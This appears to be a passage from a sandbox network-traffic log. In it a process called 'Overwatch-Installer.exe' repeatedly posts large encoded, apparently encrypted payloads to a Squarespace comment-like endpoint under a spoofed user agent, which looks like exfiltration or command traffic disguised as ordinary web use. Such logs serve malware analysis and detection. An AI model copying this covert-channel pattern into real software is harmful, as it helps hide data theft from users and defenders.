2024-09-01 20:04:37 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:37 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:37 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BRReVikaP4OwYzk0YjI0ZjZkOTc4YjE3MzlmMWJiMWI3YmFiOGU3; Path=/; Secure Set-Cookie: crumb=BRHuOLTgxx9KN2Q1MDdlNWVlMjQ5OGI3OGVmMWQ5ZWFhODc1MTc1; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: ZqRMUYHe/LZxcAJKR Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BRHuOLTgxx9KN2Q1MDdlNWVlMjQ5OGI3OGVmMWQ5ZWFhODc1MTc1"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	49774	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:37 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:37 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:37 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:37 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:38 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:37 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BYrbOSJ9nQhaM2ZlZGNmMDY3NDg2NjdhNTlhZDBlNTA5NTc2ZjBk; Path=/; Secure Set-Cookie: crumb=BXirH_82ZuqsZmViMzhhZmJlOTMwMTA4MjVjYTc3MDg5YTFjMjc2; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 8Z37CAJa/4t4QTi0i Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BXirH_82ZuqsZmViMzhhZmJlOTMwMTA4MjVjYTc3MDg5YTFjMjc2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	49775	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:38 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108472 Expect: 100-continue
2024-09-01 20:04:38 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:38 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:38 UTC	16306	OUT	Data Raw: 3d 74 51 73 50 33 36 39 66 25 32 42 69 79 58 52 5a 72 43 6b 38 55 6b 4b 76 6b 6c 2f 75 59 59 65 44 6f 4a 4c 73 65 7a 4d 53 2f 6d 6d 48 6a 55 42 71 7a 61 5a 58 52 6e 36 44 71 52 78 6d 7a 64 56 44 50 47 64 79 2f 70 37 79 71 69 6a 4a 30 4c 44 73 4d 5a 5a 52 53 34 6e 33 71 41 6b 6b 36 39 32 48 69 39 69 52 6d 63 75 33 66 75 4a 25 32 42 56 59 31 78 25 32 42 46 65 47 54 6f 49 51 67 56 79 73 79 67 43 2f 6a 6d 65 39 33 39 75 54 46 51 41 6d 6e 51 4d 72 6b 4c 70 74 31 57 4f 46 6a 76 67 38 73 52 45 52 78 35 42 42 35 66 56 75 41 49 56 64 61 65 4b 31 6b 75 64 6f 54 4a 54 65 49 6d 44 39 58 6e 50 6f 39 72 6e 6b 6d 44 48 56 4b 52 46 6d 25 32 42 4c 61 39 6a 78 34 4a 69 58 36 7a 57 77 38 50 32 37 48 48 34 47 41 6c 53 59 69 78 53 48 2f 7a 41 7a 53 78 32 5a 71 6e 50 6f 62 6d Data Ascii: =tQsP369f%2BiyXRZrCk8UkKvkl/uYYeDoJLsezMS/mmHjUBqzaZXRn6DqRxmzdVDPGdy/p7yqijJ0LDsMZZRS4n3qAkk692Hi9iRmcu3fuJ%2BVY1x%2BFeGToIQgVysygC/jme939uTFQAmnQMrkLpt1WOFjvg8sRERx5BB5fVuAIVdaeK1kudoTJTeImD9XnPo9rnkmDHVKRFm%2BLa9jx4JiX6zWw8P27HH4GAlSYixSH/zAzSx2ZqnPobm
2024-09-01 20:04:38 UTC	1	OUT	Data Raw: 45 Data Ascii: E
2024-09-01 20:04:38 UTC	16306	OUT	Data Raw: 52 6f 78 35 25 32 42 66 64 49 73 63 65 6d 35 44 74 6c 56 6c 78 55 4c 67 55 50 75 69 76 66 45 4d 76 75 56 4b 76 79 75 30 70 25 32 42 25 32 42 41 74 48 31 6f 39 67 25 32 42 79 79 4f 62 37 61 63 46 4a 68 30 54 62 47 63 51 74 71 56 4b 53 51 68 78 66 48 66 61 42 34 45 6a 4e 79 57 32 67 56 51 65 6c 54 6e 34 45 56 6b 32 66 4b 59 46 48 2f 65 65 6e 68 58 4e 43 7a 54 44 74 61 41 66 72 33 78 52 64 54 74 4c 67 34 68 6b 68 61 35 6f 5a 45 59 77 4b 53 4d 43 53 66 4b 4a 34 41 32 64 73 42 35 49 33 7a 4e 32 75 79 76 37 39 46 32 56 42 43 37 57 63 47 62 31 36 41 71 44 32 61 30 54 75 2f 6f 6a 6f 6b 71 4f 38 45 42 64 74 36 72 43 30 4d 4c 25 32 42 4c 4b 53 57 5a 71 53 37 31 7a 4a 32 65 52 77 42 71 42 75 6e 79 65 59 4a 67 51 36 67 76 76 70 6c 63 6c 6c 47 33 32 31 58 6c 5a 25 32 Data Ascii: Rox5%2BfdIscem5DtlVlxULgUPuivfEMvuVKvyu0p%2B%2BAtH1o9g%2ByyOb7acFJh0TbGcQtqVKSQhxfHfaB4EjNyW2gVQelTn4EVk2fKYFH/eenhXNCzTDtaAfr3xRdTtLg4hkha5oZEYwKSMCSfKJ4A2dsB5I3zN2uyv79F2VBC7WcGb16AqD2a0Tu/ojokqO8EBdt6rC0ML%2BLKSWZqS71zJ2eRwBqBunyeYJgQ6gvvplcllG321XlZ%2
2024-09-01 20:04:38 UTC	1	OUT	Data Raw: 63 Data Ascii: c
2024-09-01 20:04:38 UTC	16306	OUT	Data Raw: 47 75 56 37 48 78 56 72 76 37 70 74 55 6b 33 34 68 35 72 71 6e 42 72 6c 65 78 38 56 61 37 25 32 42 36 62 4e 59 46 73 71 62 73 63 72 64 6f 78 33 30 6d 7a 42 61 34 63 45 4f 46 67 4d 71 4b 55 34 4b 71 76 69 57 53 44 7a 35 36 30 71 50 33 4a 54 66 72 53 67 72 53 65 37 6c 31 6e 61 39 63 4d 45 39 47 67 30 48 34 6f 34 54 31 67 4f 31 25 32 42 54 4e 54 75 25 32 42 76 5a 39 70 25 32 42 67 52 75 47 53 70 53 52 5a 46 59 45 71 6b 73 6f 4e 65 62 46 64 62 4d 73 35 57 50 30 6a 4d 69 64 54 32 72 32 4f 62 2f 50 59 72 73 4c 36 6f 4e 7a 4f 6f 61 75 61 6d 37 41 4d 34 65 49 6c 66 47 61 64 46 69 64 78 4a 70 32 78 4c 4b 42 41 66 4f 41 79 69 67 49 70 62 68 7a 4e 54 44 4a 5a 49 67 7a 36 48 44 56 69 5a 52 77 4b 76 48 32 30 71 46 4f 46 68 35 55 37 6b 25 32 42 56 34 36 45 75 53 6a 4d Data Ascii: GuV7HxVrv7ptUk34h5rqnBrlex8Va7%2B6bNYFsqbscrdox30mzBa4cEOFgMqKU4KqviWSDz560qP3JTfrSgrSe7l1na9cME9Gg0H4o4T1gO1%2BTNTu%2BvZ9p%2BgRuGSpSRZFYEqksoNebFdbMs5WP0jMidT2r2Ob/PYrsL6oNzOoauam7AM4eIlfGadFidxJp2xLKBAfOAyigIpbhzNTDJZIgz6HDViZRwKvH20qFOFh5U7k%2BV46EuSjM
2024-09-01 20:04:38 UTC	1	OUT	Data Raw: 4c Data Ascii: L
2024-09-01 20:04:38 UTC	16306	OUT	Data Raw: 45 5a 36 4d 4f 47 38 56 72 54 38 79 44 6b 77 4e 42 59 31 61 34 56 64 4a 65 43 5a 77 32 32 6e 25 32 42 53 4a 74 72 6c 47 72 72 6e 74 53 66 34 6d 4e 4f 55 41 36 65 47 53 38 69 33 6c 49 4c 76 4f 32 6a 38 4a 62 69 69 4e 6b 48 64 4f 6d 79 44 59 43 43 33 6b 6a 71 48 32 57 31 65 6a 57 25 32 42 55 33 50 64 49 77 65 51 6f 64 69 70 44 7a 38 50 59 36 49 47 37 39 4f 69 4b 75 73 51 6b 39 34 6a 5a 74 32 51 6c 79 45 31 33 34 43 71 38 4f 75 47 63 6b 56 47 49 34 78 53 72 39 56 79 6c 53 48 74 34 31 68 64 33 58 6e 61 65 65 4b 38 54 4b 53 77 6e 73 35 6e 50 67 74 38 5a 47 59 38 32 36 68 5a 4a 35 68 49 32 4b 6c 38 66 4f 42 64 7a 31 34 34 77 47 63 69 46 25 32 42 63 46 78 64 39 2f 48 72 55 70 44 49 77 63 2f 61 41 41 6a 56 47 62 38 6e 4b 49 5a 56 77 42 43 31 33 53 46 37 6c 50 74 Data Ascii: EZ6MOG8VrT8yDkwNBY1a4VdJeCZw22n%2BSJtrlGrrntSf4mNOUA6eGS8i3lILvO2j8JbiiNkHdOmyDYCC3kjqH2W1ejW%2BU3PdIweQodipDz8PY6IG79OiKusQk94jZt2QlyE134Cq8OuGckVGI4xSr9VylSHt41hd3XnaeeK8TKSwns5nPgt8ZGY826hZJ5hI2Kl8fOBdz144wGciF%2BcFxd9/HrUpDIwc/aAAjVGb8nKIZVwBC13SF7lPt
2024-09-01 20:04:38 UTC	1	OUT	Data Raw: 63 Data Ascii: c
2024-09-01 20:04:38 UTC	16306	OUT	Data Raw: 70 35 42 36 5a 77 47 6b 58 50 77 50 25 32 42 50 70 65 44 34 31 56 74 55 43 39 66 72 6b 2f 48 43 75 54 64 37 4c 39 6f 34 2f 38 73 4b 44 73 59 58 32 59 53 49 77 78 67 57 6c 37 4b 61 70 45 50 4b 4f 6b 4d 4e 57 31 72 79 62 4e 69 4f 62 4e 75 70 72 66 36 25 32 42 65 48 4e 54 4e 32 4e 30 57 61 76 4e 79 48 59 47 68 70 43 33 25 32 42 70 78 50 2f 73 7a 61 64 78 64 66 36 58 4e 47 37 62 44 36 68 35 66 70 6d 63 4c 65 73 4f 6d 63 38 69 6e 6b 53 69 55 71 70 53 47 4a 70 55 36 76 35 77 74 36 45 63 39 75 33 63 7a 63 6a 56 69 34 71 76 71 35 2f 52 72 54 48 57 79 35 31 50 47 53 53 72 46 6f 72 76 41 25 32 42 70 68 49 57 76 41 74 66 6f 39 68 4d 36 6b 49 6a 57 4d 77 70 50 54 6b 54 47 6a 67 4c 47 4c 35 67 2f 61 59 39 4c 4c 6a 35 59 42 71 61 45 56 73 77 63 4e 65 33 48 30 75 64 32 Data Ascii: p5B6ZwGkXPwP%2BPpeD41VtUC9frk/HCuTd7L9o4/8sKDsYX2YSIwxgWl7KapEPKOkMNW1rybNiObNuprf6%2BeHNTN2N0WavNyHYGhpC3%2BpxP/szadxdf6XNG7bD6h5fpmcLesOmc8inkSiUqpSGJpU6v5wt6Ec9u3czcjVi4qvq5/RrTHWy51PGSSrForvA%2BphIWvAtfo9hM6kIjWMwpPTkTGjgLGL5g/aY9LLj5YBqaEVswcNe3H0ud2
2024-09-01 20:04:38 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:38 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BaB9xZfaxRZEZDdhNzk3YmI2OWQzNDMxMTZkNzA5ZTI3Y2Y1MzIy; Path=/; Secure Set-Cookie: crumb=BWsYdXbOAkZ8OTIwZjc4ZjI1MmM1NDE1Yzk0OTljNmQ1Y2VkY2Vh; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: fUOvbL0O/ig41Na6m Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BWsYdXbOAkZ8OTIwZjc4ZjI1MmM1NDE1Yzk0OTljNmQ1Y2VkY2Vh"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	49776	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:38 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:38 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:38 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:38 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:38 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:38 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BQvY8UmX3xLbM2MyOWJhNzY2ZWU4Nzg0ZjVmNWMwOGMyNDI1ODk3; Path=/; Secure Set-Cookie: crumb=BT2SA8Ehoy81M2I4OGIyNTU3ZjQ4YzAxNzA5Mjc3M2E1NTM1MWE0; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: wBET2Hdg/pxRZQgQn Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BT2SA8Ehoy81M2I4OGIyNTU3ZjQ4YzAxNzA5Mjc3M2E1NTM1MWE0"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	49777	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:39 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108470 Expect: 100-continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	49780	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:39 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:39 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:39 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:39 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:39 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:39 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BTwKyH393cfTYTE4MDUzZmUzOTRkNzUyODBmYTJlNTAwNjcxNDU0; Path=/; Secure Set-Cookie: crumb=BaHIC2aHDvamZjY4YWVmMzg2ZTg0ZjgwNWFlZGUyMTI4ZGJiOGE0; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: w39O0USM/0EdXfA07 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BaHIC2aHDvamZjY4YWVmMzg2ZTg0ZjgwNWFlZGUyMTI4ZGJiOGE0"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	49779	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:39 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:39 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:39 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:39 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:39 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:39 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BR1EKc6a_l0UOTQ4OTk4M2UwNzM5YzdjM2FjZWI4NDc3NmE2NWVj; Path=/; Secure Set-Cookie: crumb=BX-7PEl9UeXfNTE0N2ZmNjMxNGU3MGQzMWNiMjk5MWM4NDJjYTY4; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: oZI4TMD2/mkHgOhXA Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BX-7PEl9UeXfNTE0N2ZmNjMxNGU3MGQzMWNiMjk5MWM4NDJjYTY4"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	49781	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:40 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:40 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:40 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:40 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
